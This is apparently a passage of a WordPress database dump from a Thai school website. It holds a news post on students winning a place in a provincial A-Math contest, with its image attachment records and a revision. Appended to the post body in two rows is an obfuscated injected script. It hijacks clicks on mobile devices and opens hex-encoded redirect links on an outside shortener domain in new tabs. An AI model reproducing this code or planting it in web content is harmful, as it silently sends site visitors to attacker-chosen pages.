ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ยินดีกับนักเรียน ที่ได้รับรางวัล รองชนะเลิศ อันดับ 1 การแข่งขันเอแม็ท (A-Math) เกมต่อสมการคณิตศาสตร์ ประจำปีงบประมาณ 2567 จัดโดย อบจ.ศรีสะเกษ','','publish','closed','closed','','%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b9%84%e0%b8%94%e0%b9%89','','','2024-09-02 10:59:06','2024-09-02 03:59:06','',0,'http://pakhaeng.ssk.in.th/?p=1090',0,'post','',0),
(1091,1,'2024-09-02 10:58:00','2024-09-02 03:58:00','','S__69550086_0','','inherit','','closed','','s__69550086_0','','','2024-09-02 10:58:00','2024-09-02 03:58:00','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550086_0.jpg',0,'attachment','image/jpeg',0),
(1092,1,'2024-09-02 10:58:45','2024-09-02 03:58:45','','5BB0E853-00AB-45DF-8A20-DA4D3A06A120','','inherit','','closed','','5bb0e853-00ab-45df-8a20-da4d3a06a120','','','2024-09-02 10:58:45','2024-09-02 03:58:45','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/5BB0E853-00AB-45DF-8A20-DA4D3A06A120.jpg',0,'attachment','image/jpeg',0),
(1093,1,'2024-09-02 10:58:45','2024-09-02 03:58:45','','92409712-D1C5-441A-B3CF-46BBEB11306B','','inherit','','closed','','92409712-d1c5-441a-b3cf-46bbeb11306b','','','2024-09-02 10:58:45','2024-09-02 03:58:45','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/92409712-D1C5-441A-B3CF-46BBEB11306B.jpg',0,'attachment','image/jpeg',0),
(1094,1,'2024-09-02 10:58:45','2024-09-02 03:58:45','','3D568C24-BF80-4BF6-952F-A61B9BB91A08','','inherit','','closed','','3d568c24-bf80-4bf6-952f-a61b9bb91a08','','','2024-09-02 10:58:45','2024-09-02 03:58:45','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3D568C24-BF80-4BF6-952F-A61B9BB91A08.jpg',0,'attachment','image/jpeg',0),
(1095,1,'2024-09-02 10:58:45','2024-09-02 03:58:45','','5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E','','inherit','','closed','','5c13bdb5-b1d6-47a9-8a66-fc7f5cfee97e','','','2024-09-02 10:58:45','2024-09-02 03:58:45','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E.jpg',0,'attachment','image/jpeg',0),
(1096,1,'2024-09-02 10:58:45','2024-09-02 03:58:45','','89E33FD3-BD14-4973-B501-053D0C4343C4','','inherit','','closed','','89e33fd3-bd14-4973-b501-053d0c4343c4','','','2024-09-02 10:58:45','2024-09-02 03:58:45','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/89E33FD3-BD14-4973-B501-053D0C4343C4.jpg',0,'attachment','image/jpeg',0),
(1097,1,'2024-09-02 10:58:45','2024-09-02 03:58:45','','471BF694-20D7-486D-A69A-0329EB0C5B7E','','inherit','','closed','','471bf694-20d7-486d-a69a-0329eb0c5b7e','','','2024-09-02 10:58:45','2024-09-02 03:58:45','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/471BF694-20D7-486D-A69A-0329EB0C5B7E.jpg',0,'attachment','image/jpeg',0),
(1098,1,'2024-09-02 10:58:57','2024-09-02 03:58:57','','S__69550086_0','','inherit','','closed','','s__69550086_0-2','','','2024-09-02 10:58:57','2024-09-02 03:58:57','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550086_0-1.jpg',0,'attachment','image/jpeg',0),
(1099,1,'2024-09-02 10:58:57','2024-09-02 03:58:57','','S__69550088_0','','inherit','','closed','','s__69550088_0','','','2024-09-02 10:58:57','2024-09-02 03:58:57','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550088_0.jpg',0,'attachment','image/jpeg',0),
(1100,1,'2024-09-02 10:58:57','2024-09-02 03:58:57','','S__69550089_0','','inherit','','closed','','s__69550089_0','','','2024-09-02 10:58:57','2024-09-02 03:58:57','',1090,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550089_0.jpg',0,'attachment','image/jpeg',0),
(1101,1,'2024-09-02 10:59:04','2024-09-02 03:59:04','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":4} -->\n<h4 class=\"wp-block-heading\">อบจ.ศรีสะเกษ จัดการแข่งขันเอแม็ท (A-Math) เกมต่อสมการคณิตศาสตร์ ประจำปีงบประมาณ 2567 โดย นายวิชิต_ไตรสรณกุล นายกองค์การบริหารส่วนจังหวัดศรีสะเกษ มอบหมายให้นายอภิศักดิ์ แซ่จึง รองนายกองค์การบริหารส่วนจังหวัดศรีสะเกษ เป็นประธานเปิดโครงการ การแข่งขันเอแม็ท (A-Math) ประจำปีงบประมาณ 2567 วันที่ 31 สิงหาคม 2567 เวลา 09.00 น. ณ หอประชุมเฉลิมพระเกียรติฯ เกาะกลางน้ำห้วยน้ำคำเทศบาลเมืองศรีสะเกษ อำเภอเมืองฯ จังหวัดศรีสะเกษ โดยมี นางอุษนีพร สุมาจักร์ หัวหน้าฝ่ายส่งเสริมการศึกษา ศาสนาและวัฒนธรรม พร้อมด้วย ข้าราชการ ครู บุคลากรทางการศึกษา เจ้าหน้าที่ และนักเรียนสังกัดองค์การบริหารส่วนจังหวัดศรีสะเกษ เข้าร่วมพิธีเปิดในครั้งนี้</h4>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>นายอภิศักดิ์ แซ่จึง รองนายกองค์การบริหารส่วนจังหวัดรีสะเกษ กล่าวว่า องค์การบริหารส่วนจังหวัดศรีสะเกษได้กำหนดจัด โครงการการแข่งขันเอแม็ท (A-MATH) ประจำปีงบประมาณ 2567 โดยมีวัตถุประสงค์ในการจัดโครงการนี้คือ เพื่อให้เด็กเยาวชนและประชาชนได้มีโอกาสเสริมทักษะทางด้านคณิตศาสตร์ให้แก่ผู้เรียนด้วยผ่านกิจกรรมการแข่งขันเอแม็ท และใช้เวลาว่างให้เกิดประโยชน์ต่อตนเองครอบครัวและชุมชน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>กลุ่มเป้าหมายจำนวนทั้งสิ้น 810 คน เป็นเด็ก เยาวชน และประชาชนในจังหวัดศรีสะเกษ และจังหวัดอื่นๆ ทั่วประเทศ แบ่งการแข่งขันเป็น 4 ประเภท</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทมัธยมศึกษาตอนปลาย จำนวน 185 คน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทประถมศึกษา 104 ทีม จำนวน 208 คน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทมัธยมศึกษาตอน 190 ทีม จำนวน 382 คน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1092,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/5BB0E853-00AB-45DF-8A20-DA4D3A06A120-1024x576.jpg\" alt=\"\" class=\"wp-image-1092\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1097,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/471BF694-20D7-486D-A69A-0329EB0C5B7E-1024x576.jpg\" alt=\"\" class=\"wp-image-1097\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1093,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/92409712-D1C5-441A-B3CF-46BBEB11306B-1024x576.jpg\" alt=\"\" class=\"wp-image-1093\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1096,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/89E33FD3-BD14-4973-B501-053D0C4343C4-1024x576.jpg\" alt=\"\" class=\"wp-image-1096\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1094,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3D568C24-BF80-4BF6-952F-A61B9BB91A08-1024x576.jpg\" alt=\"\" class=\"wp-image-1094\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1095,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-1024x576.jpg\" alt=\"\" class=\"wp-image-1095\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1098,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550086_0-1.jpg\" alt=\"\" class=\"wp-image-1098\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1099,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550088_0.jpg\" alt=\"\" class=\"wp-image-1099\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1100,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69550089_0.jpg\" alt=\"\" class=\"wp-image-1100\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ยินดีกับนักเรียน ที่ได้รับรางวัล รองชนะเลิศ อันดับ 1 การแข่งขันเอแม็ท (A-Math) เกมต่อสมการคณิตศาสตร์ ประจำปีงบประมาณ 2567 จัดโดย อบจ.ศรีสะเกษ','','inherit','closed','closed','','1090-revision-v1','','','2024-09-02 10:59:04','2024-09-02 03:59:04','',1090,'http://pakhaeng.ssk.in.th/?p=1101',0,'revision','',0),
